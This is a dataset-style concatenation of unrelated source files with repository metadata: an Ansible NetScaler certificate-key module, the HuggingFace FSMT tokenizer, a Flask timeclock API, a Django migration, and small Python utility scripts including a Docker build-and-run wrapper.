'supported_by': 'community'}
DOCUMENTATION = '''
---
module: netscaler_ssl_certkey
short_description: Manage ssl cerificate keys.
description:
- Manage ssl cerificate keys.
version_added: "2.4.0"
author: George Nikolopoulos (@giorgos-nikolopoulos)
options:
certkey:
description:
- >-
Name for the certificate and private-key pair. Must begin with an ASCII alphanumeric or underscore
C(_) character, and must contain only ASCII alphanumeric, underscore C(_), hash C(#), period C(.), space C( ),
colon C(:), at C(@), equals C(=), and hyphen C(-) characters. Cannot be changed after the certificate-key
pair is created.
- "The following requirement applies only to the NetScaler CLI:"
- >-
If the name includes one or more spaces, enclose the name in double or single quotation marks (for
example, "my cert" or 'my cert').
- "Minimum length = 1"
cert:
description:
- >-
Name of and, optionally, path to the X509 certificate file that is used to form the certificate-key
pair. The certificate file should be present on the appliance's hard-disk drive or solid-state drive.
Storing a certificate in any location other than the default might cause inconsistency in a high
availability setup. /nsconfig/ssl/ is the default path.
- "Minimum length = 1"
key:
description:
- >-
Name of and, optionally, path to the private-key file that is used to form the certificate-key pair.
The certificate file should be present on the appliance's hard-disk drive or solid-state drive.
Storing a certificate in any location other than the default might cause inconsistency in a high
availability setup. /nsconfig/ssl/ is the default path.
- "Minimum length = 1"
password:
description:
- >-
Passphrase that was used to encrypt the private-key. Use this option to load encrypted private-keys
in PEM format.
inform:
choices:
- 'DER'
- 'PEM'
- 'PFX'
description:
- >-
Input format of the certificate and the private-key files. The three formats supported by the
appliance are:
- "PEM - Privacy Enhanced Mail"
- "DER - Distinguished Encoding Rule"
- "PFX - Personal Information Exchange."
passplain:
description:
- >-
Pass phrase used to encrypt the private-key. Required when adding an encrypted private-key in PEM
format.
- "Minimum length = 1"
expirymonitor:
choices:
- 'enabled'
- 'disabled'
description:
- "Issue an alert when the certificate is about to expire."
notificationperiod:
description:
- >-
Time, in number of days, before certificate expiration, at which to generate an alert that the
certificate is about to expire.
- "Minimum value = C(10)"
- "Maximum value = C(100)"
extends_documentation_fragment: netscaler
requirements:
- nitro python sdk
'''
EXAMPLES = '''
- name: Setup ssl certkey
delegate_to: localhost
netscaler_ssl_certkey:
nitro_user: nsroot
nitro_pass: nsroot
nsip: 172.18.0.2
certkey: certirificate_1
cert: server.crt
key: server.key
expirymonitor: enabled
notificationperiod: 30
inform: PEM
password: False
passplain: somesecret
'''
RETURN = '''
loglines:
description: list of logged messages by the module
returned: always
type: list
sample: "['message 1', 'message 2']"
msg:
description: Message detailing the failure reason
returned: failure
type: str
sample: "Action does not exist"
diff:
description: List of differences between the actual configured object and the configuration specified in the module
returned: failure
type: dict
sample: "{ 'targetlbvserver': 'difference. ours: (str) server1 other: (str) server2' }"
'''
try:
from nssrc.com.citrix.netscaler.nitro.resource.config.ssl.sslcertkey import sslcertkey
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
PYTHON_SDK_IMPORTED = True
except ImportError as e:
PYTHON_SDK_IMPORTED = False
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.network.netscaler.netscaler import ConfigProxy, get_nitro_client, netscaler_common_arguments, log, loglines, \
get_immutables_intersection
def key_exists(client, module):
log('Checking if key exists')
log('certkey is %s' % module.params['certkey'])
all_certificates = sslcertkey.get(client)
certkeys = [item.certkey for item in all_certificates]
if module.params['certkey'] in certkeys:
return True
else:
return False
def key_identical(client, module, sslcertkey_proxy):
log('Checking if configured key is identical')
sslcertkey_list = sslcertkey.get_filtered(client, 'certkey:%s' % module.params['certkey'])
diff_dict = sslcertkey_proxy.diff_object(sslcertkey_list[0])
if 'password' in diff_dict:
del diff_dict['password']
if 'passplain' in diff_dict:
del diff_dict['passplain']
if len(diff_dict) == 0:
return True
else:
return False
def diff_list(client, module, sslcertkey_proxy):
sslcertkey_list = sslcertkey.get_filtered(client, 'certkey:%s' % module.params['certkey'])
return sslcertkey_proxy.diff_object(sslcertkey_list[0])
def main():
module_specific_arguments = dict(
certkey=dict(type='str'),
cert=dict(type='str'),
key=dict(type='str'),
password=dict(type='bool'),
inform=dict(
type='str',
choices=[
'DER',
'PEM',
'PFX',
]
),
passplain=dict(
type='str',
no_log=True,
),
expirymonitor=dict(
type='str',
choices=[
'enabled',
'disabled',
]
),
notificationperiod=dict(type='float'),
)
argument_spec = dict()
argument_spec.update(netscaler_common_arguments)
argument_spec.update(module_specific_arguments)
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
)
module_result = dict(
changed=False,
failed=False,
loglines=loglines,
)
# Fail the module if imports failed
if not PYTHON_SDK_IMPORTED:
module.fail_json(msg='Could not load nitro python sdk')
# Fallthrough to rest of execution
client = get_nitro_client(module)
try:
client.login()
except nitro_exception as e:
msg = "nitro exception during login. errorcode=%s, message=%s" % (str(e.errorcode), e.message)
module.fail_json(msg=msg)
except Exception as e:
if str(type(e)) == "<class 'requests.exceptions.ConnectionError'>":
module.fail_json(msg='Connection error %s' % str(e))
elif str(type(e)) == "<class 'requests.exceptions.SSLError'>":
module.fail_json(msg='SSL Error %s' % str(e))
else:
module.fail_json(msg='Unexpected error during login %s' % str(e))
readwrite_attrs = [
'certkey',
'cert',
'key',
'password',
'inform',
'passplain',
'expirymonitor',
'notificationperiod',
]
readonly_attrs = [
'signaturealg',
'certificatetype',
'serial',
'issuer',
'clientcertnotbefore',
'clientcertnotafter',
'daystoexpiration',
'subject',
'publickey',
'publickeysize',
'version',
'priority',
'status',
'passcrypt',
'data',
'servicename',
]
immutable_attrs = [
'certkey',
'cert',
'key',
'password',
'inform',
'passplain',
]
transforms = {
'expirymonitor': [lambda v: v.upper()],
}
# Instantiate config proxy
sslcertkey_proxy = ConfigProxy(
actual=sslcertkey(),
client=client,
attribute_values_dict=module.params,
readwrite_attrs=readwrite_attrs,
readonly_attrs=readonly_attrs,
immutable_attrs=immutable_attrs,
transforms=transforms,
)
try:
if module.params['state'] == 'present':
log('Applying actions for state present')
if not key_exists(client, module):
if not module.check_mode:
log('Adding certificate key')
sslcertkey_proxy.add()
if module.params['save_config']:
client.save_config()
module_result['changed'] = True
elif not key_identical(client, module, sslcertkey_proxy):
# Check if we try to change value of immutable attributes
immutables_changed = get_immutables_intersection(sslcertkey_proxy, diff_list(client, module, sslcertkey_proxy).keys())
if immutables_changed != []:
module.fail_json(
msg='Cannot update immutable attributes %s' % (immutables_changed,),
diff=diff_list(client, module, sslcertkey_proxy),
**module_result
)
if not module.check_mode:
sslcertkey_proxy.update()
if module.params['save_config']:
client.save_config()
module_result['changed'] = True
else:
module_result['changed'] = False
# Sanity check for state
if not module.check_mode:
log('Sanity checks for state present')
if not key_exists(client, module):
module.fail_json(msg='SSL certkey does not exist')
if not key_identical(client, module, sslcertkey_proxy):
module.fail_json(msg='SSL certkey differs from configured', diff=diff_list(client, module, sslcertkey_proxy))
elif module.params['state'] == 'absent':
log('Applying actions for state absent')
if key_exists(client, module):
if not module.check_mode:
sslcertkey_proxy.delete()
if module.params['save_config']:
client.save_config()
module_result['changed'] = True
else:
module_result['changed'] = False
# Sanity check for state
if not module.check_mode:
log('Sanity checks for state absent')
if key_exists(client, module):
module.fail_json(msg='SSL certkey still exists')
except nitro_exception as e:
msg = "nitro exception errorcode=%s, message=%s" % (str(e.errorcode), e.message)
module.fail_json(msg=msg, **module_result)
client.logout()
module.exit_json(**module_result)
if __name__ == "__main__":
main()
| 31.86828
| 136
| 0.592324
|
226d18cc3eab0ef89909ec04d8bc2573e6aa763b
| 19,460
|
py
|
Python
|
src/transformers/models/fsmt/tokenization_fsmt.py
|
reichang182/Transformer
|
301536b15f1e757c51411800c25876617e9f1191
|
[
"Apache-2.0"
] | 2
|
2021-09-20T05:44:21.000Z
|
2022-01-25T08:13:44.000Z
|
src/transformers/models/fsmt/tokenization_fsmt.py
|
slavetothebiologicalforce/transformers
|
6f90c29eaaba898919b7689ab7e2cfce1604cdb8
|
[
"Apache-2.0"
] | null | null | null |
src/transformers/models/fsmt/tokenization_fsmt.py
|
slavetothebiologicalforce/transformers
|
6f90c29eaaba898919b7689ab7e2cfce1604cdb8
|
[
"Apache-2.0"
] | 1
|
2021-04-19T20:49:55.000Z
|
2021-04-19T20:49:55.000Z
|
# coding=utf-8
# Copyright 2019 The Open AI Team Authors and The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tokenization classes for FSMT."""
import json
import os
import re
import unicodedata
from typing import Dict, List, Optional, Tuple
import sacremoses as sm
from ...tokenization_utils import PreTrainedTokenizer
from ...utils import logging
logger = logging.get_logger(__name__)
VOCAB_FILES_NAMES = {
"src_vocab_file": "vocab-src.json",
"tgt_vocab_file": "vocab-tgt.json",
"merges_file": "merges.txt",
}
PRETRAINED_VOCAB_FILES_MAP = {
"src_vocab_file": {
"stas/tiny-wmt19-en-de": "https://huggingface.co/stas/tiny-wmt19-en-de/resolve/main/vocab-src.json"
},
"tgt_vocab_file": {
"stas/tiny-wmt19-en-de": "https://huggingface.co/stas/tiny-wmt19-en-de/resolve/main/vocab-tgt.json"
},
"merges_file": {"stas/tiny-wmt19-en-de": "https://huggingface.co/stas/tiny-wmt19-en-de/resolve/main/merges.txt"},
}
PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {"stas/tiny-wmt19-en-de": 1024}
PRETRAINED_INIT_CONFIGURATION = {
"stas/tiny-wmt19-en-de": {
"langs": ["en", "de"],
"model_max_length": 1024,
"special_tokens_map_file": None,
"full_tokenizer_file": None,
}
}
def get_pairs(word):
"""
Return set of symbol pairs in a word. word is represented as tuple of symbols (symbols being variable-length
strings)
"""
pairs = set()
prev_char = word[0]
for char in word[1:]:
pairs.add((prev_char, char))
prev_char = char
return pairs
def replace_unicode_punct(text):
"""
Port of https://github.com/moses-smt/mosesdecoder/blob/master/scripts/tokenizer/replace-unicode-punctuation.perl
"""
text = text.replace(",", ",")
text = re.sub(r"。\s*", ". ", text)
text = text.replace("、", ",")
text = text.replace("”", '"')
text = text.replace("“", '"')
text = text.replace("∶", ":")
text = text.replace(":", ":")
text = text.replace("?", "?")
text = text.replace("《", '"')
text = text.replace("》", '"')
text = text.replace(")", ")")
text = text.replace("!", "!")
text = text.replace("(", "(")
text = text.replace(";", ";")
text = text.replace("1", "1")
text = text.replace("」", '"')
text = text.replace("「", '"')
text = text.replace("0", "0")
text = text.replace("3", "3")
text = text.replace("2", "2")
text = text.replace("5", "5")
text = text.replace("6", "6")
text = text.replace("9", "9")
text = text.replace("7", "7")
text = text.replace("8", "8")
text = text.replace("4", "4")
text = re.sub(r".\s*", ". ", text)
text = text.replace("~", "~")
text = text.replace("’", "'")
text = text.replace("…", "...")
text = text.replace("━", "-")
text = text.replace("〈", "<")
text = text.replace("〉", ">")
text = text.replace("【", "[")
text = text.replace("】", "]")
text = text.replace("%", "%")
return text
def remove_non_printing_char(text):
"""
Port of https://github.com/moses-smt/mosesdecoder/blob/master/scripts/tokenizer/remove-non-printing-char.perl
"""
output = []
for char in text:
cat = unicodedata.category(char)
if cat.startswith("C"):
continue
output.append(char)
return "".join(output)
# Porting notes:
# this one is modeled after XLMTokenizer
#
# added:
# - src_vocab_file,
# - tgt_vocab_file,
# - langs,
class FSMTTokenizer(PreTrainedTokenizer):
"""
Construct an FAIRSEQ Transformer tokenizer. Based on Byte-Pair Encoding. The tokenization process is the following:
- Moses preprocessing and tokenization.
- Normalizing all inputs text.
- The arguments ``special_tokens`` and the function ``set_special_tokens``, can be used to add additional symbols
(like "__classify__") to a vocabulary.
- The argument :obj:`langs` defines a pair of languages.
This tokenizer inherits from :class:`~transformers.PreTrainedTokenizer` which contains most of the main methods.
Users should refer to this superclass for more information regarding those methods.
Args:
langs (:obj:`List[str]`):
A list of two languages to translate from and to, for instance :obj:`["en", "ru"]`.
src_vocab_file (:obj:`str`):
File containing the vocabulary for the source language.
tgt_vocab_file (:obj:`st`):
File containing the vocabulary for the target language.
merges_file (:obj:`str`):
File containing the merges.
do_lower_case (:obj:`bool`, `optional`, defaults to :obj:`False`):
Whether or not to lowercase the input when tokenizing.
unk_token (:obj:`str`, `optional`, defaults to :obj:`"<unk>"`):
The unknown token. A token that is not in the vocabulary cannot be converted to an ID and is set to be this
token instead.
bos_token (:obj:`str`, `optional`, defaults to :obj:`"<s>"`):
The beginning of sequence token that was used during pretraining. Can be used a sequence classifier token.
.. note::
When building a sequence using special tokens, this is not the token that is used for the beginning of
sequence. The token used is the :obj:`cls_token`.
sep_token (:obj:`str`, `optional`, defaults to :obj:`"</s>"`):
The separator token, which is used when building a sequence from multiple sequences, e.g. two sequences for
sequence classification or for a text and a question for question answering. It is also used as the last
token of a sequence built with special tokens.
pad_token (:obj:`str`, `optional`, defaults to :obj:`"<pad>"`):
The token used for padding, for example when batching sequences of different lengths.
"""
vocab_files_names = VOCAB_FILES_NAMES
pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP
pretrained_init_configuration = PRETRAINED_INIT_CONFIGURATION
max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES
model_input_names = ["input_ids", "attention_mask"]
def __init__(
self,
langs=None,
src_vocab_file=None,
tgt_vocab_file=None,
merges_file=None,
do_lower_case=False,
unk_token="<unk>",
bos_token="<s>",
sep_token="</s>",
pad_token="<pad>",
**kwargs
):
super().__init__(
langs=langs,
src_vocab_file=src_vocab_file,
tgt_vocab_file=tgt_vocab_file,
merges_file=merges_file,
do_lower_case=do_lower_case,
unk_token=unk_token,
bos_token=bos_token,
sep_token=sep_token,
pad_token=pad_token,
**kwargs,
)
self.src_vocab_file = src_vocab_file
self.tgt_vocab_file = tgt_vocab_file
self.merges_file = merges_file
self.do_lower_case = do_lower_case
# cache of sm.MosesPunctNormalizer instance
self.cache_moses_punct_normalizer = dict()
# cache of sm.MosesTokenizer instance
self.cache_moses_tokenizer = dict()
self.cache_moses_detokenizer = dict()
if langs and len(langs) == 2:
self.src_lang, self.tgt_lang = langs
else:
raise ValueError(
f"arg `langs` needs to be a list of 2 langs, e.g. ['en', 'ru'], but got {langs}. "
"Usually that means that tokenizer can't find a mapping for the given model path "
"in PRETRAINED_VOCAB_FILES_MAP, and other maps of this tokenizer."
)
with open(src_vocab_file, encoding="utf-8") as src_vocab_handle:
self.encoder = json.load(src_vocab_handle)
with open(tgt_vocab_file, encoding="utf-8") as tgt_vocab_handle:
tgt_vocab = json.load(tgt_vocab_handle)
self.decoder = {v: k for k, v in tgt_vocab.items()}
with open(merges_file, encoding="utf-8") as merges_handle:
merges = merges_handle.read().split("\n")[:-1]
merges = [tuple(merge.split()[:2]) for merge in merges]
self.bpe_ranks = dict(zip(merges, range(len(merges))))
self.cache = {}
# hack override
def get_vocab(self) -> Dict[str, int]:
return self.get_src_vocab()
# hack override
@property
def vocab_size(self) -> int:
return self.src_vocab_size
def moses_punct_norm(self, text, lang):
if lang not in self.cache_moses_punct_normalizer:
punct_normalizer = sm.MosesPunctNormalizer(lang=lang)
self.cache_moses_punct_normalizer[lang] = punct_normalizer
return self.cache_moses_punct_normalizer[lang].normalize(text)
def moses_tokenize(self, text, lang):
if lang not in self.cache_moses_tokenizer:
moses_tokenizer = sm.MosesTokenizer(lang=lang)
self.cache_moses_tokenizer[lang] = moses_tokenizer
return self.cache_moses_tokenizer[lang].tokenize(
text, aggressive_dash_splits=True, return_str=False, escape=True
)
def moses_detokenize(self, tokens, lang):
if lang not in self.cache_moses_tokenizer:
moses_detokenizer = sm.MosesDetokenizer(lang=self.tgt_lang)
self.cache_moses_detokenizer[lang] = moses_detokenizer
return self.cache_moses_detokenizer[lang].detokenize(tokens)
def moses_pipeline(self, text, lang):
text = replace_unicode_punct(text)
text = self.moses_punct_norm(text, lang)
text = remove_non_printing_char(text)
return text
@property
def src_vocab_size(self):
return len(self.encoder)
@property
def tgt_vocab_size(self):
return len(self.decoder)
def get_src_vocab(self):
return dict(self.encoder, **self.added_tokens_encoder)
def get_tgt_vocab(self):
return dict(self.decoder, **self.added_tokens_decoder)
def bpe(self, token):
word = tuple(token[:-1]) + (token[-1] + "</w>",)
if token in self.cache:
return self.cache[token]
pairs = get_pairs(word)
if not pairs:
return token + "</w>"
while True:
bigram = min(pairs, key=lambda pair: self.bpe_ranks.get(pair, float("inf")))
if bigram not in self.bpe_ranks:
break
first, second = bigram
new_word = []
i = 0
while i < len(word):
try:
j = word.index(first, i)
except ValueError:
new_word.extend(word[i:])
break
else:
new_word.extend(word[i:j])
i = j
if word[i] == first and i < len(word) - 1 and word[i + 1] == second:
new_word.append(first + second)
i += 2
else:
new_word.append(word[i])
i += 1
new_word = tuple(new_word)
word = new_word
if len(word) == 1:
break
else:
pairs = get_pairs(word)
word = " ".join(word)
if word == "\n </w>":
word = "\n</w>"
self.cache[token] = word
return word
def _tokenize(self, text, lang="en", bypass_tokenizer=False):
"""
Tokenize a string given language code using Moses.
Details of tokenization:
- [sacremoses](https://github.com/alvations/sacremoses): port of Moses
- Install with `pip install sacremoses`
Args:
- lang: ISO language code (default = 'en') (string). Languages should belong of the model supported
languages. However, we don't enforce it.
- bypass_tokenizer: Allow users to preprocess and tokenize the sentences externally (default = False)
(bool). If True, we only apply BPE.
Returns:
List of tokens.
"""
# ignore `lang` which is currently isn't explicitly passed in tokenization_utils.py and always results in lang=en
# if lang != self.src_lang:
# raise ValueError(f"Expected lang={self.src_lang}, but got {lang}")
lang = self.src_lang
if self.do_lower_case:
text = text.lower()
if bypass_tokenizer:
text = text.split()
else:
text = self.moses_pipeline(text, lang=lang)
text = self.moses_tokenize(text, lang=lang)
split_tokens = []
for token in text:
if token:
split_tokens.extend([t for t in self.bpe(token).split(" ")])
return split_tokens
def _convert_token_to_id(self, token):
""" Converts a token (str) in an id using the vocab. """
return self.encoder.get(token, self.encoder.get(self.unk_token))
def _convert_id_to_token(self, index):
"""Converts an index (integer) in a token (str) using the vocab."""
return self.decoder.get(index, self.unk_token)
def convert_tokens_to_string(self, tokens):
""" Converts a sequence of tokens (string) in a single string. """
# remove BPE
tokens = [t.replace(" ", "").replace("</w>", " ") for t in tokens]
tokens = "".join(tokens).split()
# detokenize
text = self.moses_detokenize(tokens, self.tgt_lang)
return text
def build_inputs_with_special_tokens(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None
) -> List[int]:
"""
Build model inputs from a sequence or a pair of sequence for sequence classification tasks by concatenating and
adding special tokens. A FAIRSEQ Transformer sequence has the following format:
- single sequence: ``<s> X </s>``
- pair of sequences: ``<s> A </s> B </s>``
Args:
token_ids_0 (:obj:`List[int]`):
List of IDs to which the special tokens will be added.
token_ids_1 (:obj:`List[int]`, `optional`):
Optional second list of IDs for sequence pairs.
Returns:
:obj:`List[int]`: List of `input IDs <../glossary.html#input-ids>`__ with the appropriate special tokens.
"""
sep = [self.sep_token_id]
# no bos used in fairseq
if token_ids_1 is None:
return token_ids_0 + sep
return token_ids_0 + sep + token_ids_1 + sep
def get_special_tokens_mask(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None, already_has_special_tokens: bool = False
) -> List[int]:
"""
Retrieve sequence ids from a token list that has no special tokens added. This method is called when adding
special tokens using the tokenizer ``prepare_for_model`` method.
Args:
token_ids_0 (:obj:`List[int]`):
List of IDs.
token_ids_1 (:obj:`List[int]`, `optional`):
Optional second list of IDs for sequence pairs.
already_has_special_tokens (:obj:`bool`, `optional`, defaults to :obj:`False`):
Whether or not the token list is already formatted with special tokens for the model.
Returns:
:obj:`List[int]`: A list of integers in the range [0, 1]: 1 for a special token, 0 for a sequence token.
"""
if already_has_special_tokens:
return super().get_special_tokens_mask(
token_ids_0=token_ids_0, token_ids_1=token_ids_1, already_has_special_tokens=True
)
# no bos used in fairseq
if token_ids_1 is not None:
return ([0] * len(token_ids_0)) + [1] + ([0] * len(token_ids_1)) + [1]
return ([0] * len(token_ids_0)) + [1]
def create_token_type_ids_from_sequences(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None
) -> List[int]:
"""
Create a mask from the two sequences passed to be used in a sequence-pair classification task. A FAIRSEQ
Transformer sequence pair mask has the following format:
::
0 0 0 0 0 0 0 0 0 0 0 1 1 1 1 1 1 1 1 1
| first sequence | second sequence |
If :obj:`token_ids_1` is :obj:`None`, this method only returns the first portion of the mask (0s).
Args:
token_ids_0 (:obj:`List[int]`):
List of IDs.
token_ids_1 (:obj:`List[int]`, `optional`):
Optional second list of IDs for sequence pairs.
Returns:
:obj:`List[int]`: List of `token type IDs <../glossary.html#token-type-ids>`_ according to the given
sequence(s).
Creates a mask from the two sequences passed to be used in a sequence-pair classification task. An
FAIRSEQ_TRANSFORMER sequence pair mask has the following format:
"""
sep = [self.sep_token_id]
# no bos used in fairseq
if token_ids_1 is None:
return len(token_ids_0 + sep) * [0]
return len(token_ids_0 + sep) * [0] + len(token_ids_1 + sep) * [1]
def save_vocabulary(self, save_directory: str, filename_prefix: Optional[str] = None) -> Tuple[str]:
if not os.path.isdir(save_directory):
logger.error(f"Vocabulary path ({save_directory}) should be a directory")
return
src_vocab_file = os.path.join(
save_directory, (filename_prefix + "-" if filename_prefix else "") + VOCAB_FILES_NAMES["src_vocab_file"]
)
tgt_vocab_file = os.path.join(
save_directory, (filename_prefix + "-" if filename_prefix else "") + VOCAB_FILES_NAMES["tgt_vocab_file"]
)
merges_file = os.path.join(
save_directory, (filename_prefix + "-" if filename_prefix else "") + VOCAB_FILES_NAMES["merges_file"]
)
with open(src_vocab_file, "w", encoding="utf-8") as f:
f.write(json.dumps(self.encoder, ensure_ascii=False))
with open(tgt_vocab_file, "w", encoding="utf-8") as f:
tgt_vocab = {v: k for k, v in self.decoder.items()}
f.write(json.dumps(tgt_vocab, ensure_ascii=False))
index = 0
with open(merges_file, "w", encoding="utf-8") as writer:
for bpe_tokens, token_index in sorted(self.bpe_ranks.items(), key=lambda kv: kv[1]):
if index != token_index:
logger.warning(
f"Saving vocabulary to {merges_file}: BPE merge indices are not consecutive."
" Please check that the tokenizer is not corrupted!"
)
index = token_index
writer.write(" ".join(bpe_tokens) + "\n")
index += 1
return src_vocab_file, tgt_vocab_file, merges_file
| 37.640232
| 121
| 0.605447
|
0c7ac38273a2c7a34ff7631c51a1005aa56f7201
| 1,471
|
py
|
Python
|
app/apiv2/organizations/locations/roles/schedules/timeclocks/timeclocks.py
|
matthewstrasiotto/suite
|
8d83208f965f23e0a33db6b3b7f9e5126f7324f8
|
[
"MIT"
] | null | null | null |
app/apiv2/organizations/locations/roles/schedules/timeclocks/timeclocks.py
|
matthewstrasiotto/suite
|
8d83208f965f23e0a33db6b3b7f9e5126f7324f8
|
[
"MIT"
] | null | null | null |
app/apiv2/organizations/locations/roles/schedules/timeclocks/timeclocks.py
|
matthewstrasiotto/suite
|
8d83208f965f23e0a33db6b3b7f9e5126f7324f8
|
[
"MIT"
] | null | null | null |
from flask_restful import marshal, reqparse, Resource
from app.constants import API_ENVELOPE
from app.models import Schedule2, Timeclock
from app.apiv2.decorators import verify_org_location_role_schedule, \
permission_location_manager
from app.apiv2.marshal import timeclock_fields
class ScheduleTimeclocksApi(Resource):
@verify_org_location_role_schedule
@permission_location_manager
def get(self, org_id, location_id, role_id, schedule_id):
"""
returns all timeclock data that correlates to the timespan of a given schedule
"""
parser = reqparse.RequestParser()
parser.add_argument("user_id", type=int)
parameters = parser.parse_args()
# Filter out null values
parameters = dict((k, v) for k, v in parameters.items()
if v is not None)
# get schedule object
schedule = Schedule2.query.get_or_404(schedule_id)
# prepare query
timeclocks = Timeclock.query \
.filter_by(role_id=role_id) \
.filter(Timeclock.start >= schedule.start) \
.filter(Timeclock.start < schedule.stop)
# add user id if optionally added
if "user_id" in parameters:
timeclocks = timeclocks.filter_by(
user_id=parameters.get("user_id"))
return {
API_ENVELOPE:
[marshal(timeclock, timeclock_fields) for timeclock in timeclocks.all()]
}
| 32.688889
| 86
| 0.658736
|
af00da665410b17978a3af46701683e86932fbe2
| 1,012
|
py
|
Python
|
bin/update-search-index.py
|
not-nexus/shelf
|
ea59703082402ad3b6454482f0487418295fbd19
|
[
"MIT"
] | 4
|
2016-11-07T13:02:18.000Z
|
2019-09-03T02:04:05.000Z
|
bin/update-search-index.py
|
not-nexus/shelf
|
ea59703082402ad3b6454482f0487418295fbd19
|
[
"MIT"
] | 21
|
2016-11-30T20:44:52.000Z
|
2017-05-02T15:38:56.000Z
|
bin/update-search-index.py
|
not-nexus/shelf
|
ea59703082402ad3b6454482f0487418295fbd19
|
[
"MIT"
] | 2
|
2017-01-24T14:36:04.000Z
|
2020-01-13T16:10:05.000Z
|
#!/usr/bin/env python
import docopt
from shelf.bulk_update.utils import run
doc = """Usage: ./update-search-index [options] <config-path>
Options:
-b --bucket bucket The name of the bucket, or buckets that you
would like to rebuild the search index for.
If this is not sent along, all buckets will
be rebuilt. If multiple buckets are provided
they should be comma separated.
Example: -b "bucket1, bucket2, etc.."
-c --chunk-size chunk-size How many artifacts (per bucket) should be
processed at once.
[default: 20]
-v --verbose If set, the log level will be set to DEBUG.
Arguments:
<config-path> Path to the yaml configuration file.
"""
args = docopt.docopt(doc)
run(args)
| 37.481481
| 81
| 0.499012
|
91616a80184b52ab46dccf79fd5420217f8cc819
| 118
|
py
|
Python
|
n2w_it/__init__.py
|
IlGalvo/N2W-IT
|
5dd0ce1c688d2e1e25feb484b93f4ea83394824e
|
[
"MIT"
] | 1
|
2021-03-29T11:51:25.000Z
|
2021-03-29T11:51:25.000Z
|
n2w_it/__init__.py
|
IlGalvo/N2W-IT
|
5dd0ce1c688d2e1e25feb484b93f4ea83394824e
|
[
"MIT"
] | null | null | null |
n2w_it/__init__.py
|
IlGalvo/N2W-IT
|
5dd0ce1c688d2e1e25feb484b93f4ea83394824e
|
[
"MIT"
] | null | null | null |
__author__ = "Andrea Galvani"
__email__ = "Andrea.Galvani96@outlook.com"
__version__ = "1.0.1"
from .n2w_it import *
| 19.666667
| 42
| 0.737288
|
d87029ab643909ccbdbb6934a43ef8d386817362
| 515
|
py
|
Python
|
webdev/fornecedores/migrations/0018_auto_20210524_1806.py
|
h-zanetti/jewelry-manager
|
74166b89f492303b8ebf5ff8af058f394eb2a28b
|
[
"MIT"
] | null | null | null |
webdev/fornecedores/migrations/0018_auto_20210524_1806.py
|
h-zanetti/jewelry-manager
|
74166b89f492303b8ebf5ff8af058f394eb2a28b
|
[
"MIT"
] | 103
|
2021-04-25T21:28:11.000Z
|
2022-03-15T01:36:31.000Z
|
webdev/fornecedores/migrations/0018_auto_20210524_1806.py
|
h-zanetti/jewelry-manager
|
74166b89f492303b8ebf5ff8af058f394eb2a28b
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.1.5 on 2021-05-24 21:06
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('fornecedores', '0017_auto_20210520_1847'),
]
operations = [
migrations.AlterField(
model_name='dadosbancarios',
name='tipo_de_transacao',
field=models.CharField(choices=[('', 'Tipo de Transação'), ('dp', 'Depósito'), ('px', 'Pix')], max_length=2, verbose_name='Tipo de Transação'),
),
]
| 27.105263
| 155
| 0.617476
|
eac28bcd365a2a919beca9f8de527baa4cb54e1e
| 2,216
|
py
|
Python
|
src/quico.py
|
JohannHospice/quico
|
3936c1849c06b93b4d167734e526a5526cc7b053
|
[
"MIT"
] | null | null | null |
src/quico.py
|
JohannHospice/quico
|
3936c1849c06b93b4d167734e526a5526cc7b053
|
[
"MIT"
] | null | null | null |
src/quico.py
|
JohannHospice/quico
|
3936c1849c06b93b4d167734e526a5526cc7b053
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import argparse
import subprocess
def main():
args, unknown_joined = parse_known_args()
build_cmd = CommandBuilder(['docker', 'build'])
build_cmd.append_with_option('-f', args.file)
build_cmd.append_with_option('-t', args.tag)
build_cmd.append(args.directory)
run_cmd = CommandBuilder(['docker', 'run'])
run_cmd.append_with_option('--network', args.network)
for volume in args.volume if args.volume else []:
run_cmd.append_with_option('-v', volume)
run_cmd.append_with_option('-p', args.publish)
run_cmd.append_with_option('-ti', args.tag)
run_cmd.append(unknown_joined)
try :
read_proc('build', build_cmd.build())
read_proc('run', run_cmd.build())
except Exception as e:
print(e)
def parse_known_args():
parser = argparse.ArgumentParser(description='Quico ou quick-container permet de compiler puis lancer rapidement un conteneur docker.')
parser.add_argument('directory', help='Dossier ou compiler l\'image docker.')
parser.add_argument('-t', '--tag', required=True)
parser.add_argument('-n', '--network', help="Réseau ou lancer le conteneur docker", default='bridge', required=False)
parser.add_argument('-f', '--file', help="Chemin vers le Dockerfile à compiler", default='Dockerfile', required=False)
parser.add_argument('-p', '--publish', required=False)
parser.add_argument('-v', '--volume', action='append', required=False)
args, unknown = parser.parse_known_args()
unknown_joined = ' '.join(unknown)
return args, unknown_joined
def read_proc(title, cmd):
print(f"+{title}: start ({cmd})")
try:
subprocess.check_call(cmd, shell=True)
except:
raise Exception(f"+{title}: raised error")
class CommandBuilder:
cmd = []
def __init__(self, cmd):
self.cmd = cmd
def append_with_option(self, option, value):
if value:
self.cmd.append(option)
self.cmd.append(value)
return self
def append(self, text):
self.cmd.append(text)
return self
def build(self):
return " ".join(self.cmd)
if __name__ == '__main__':
main()
| 31.657143
| 139
| 0.657491
|
0c82e334b65819d5d953cce17a9ef92ead5d98f2
| 7,065
|
py
|
Python
|
cscs-checks/microbenchmarks/mpi/halo_exchange/halo_cell_exchange.py
|
CLIP-HPC/reframe
|
eddf0b2508c2ba644e4c3aba5652e57fddfde106
|
[
"BSD-3-Clause"
] | 167
|
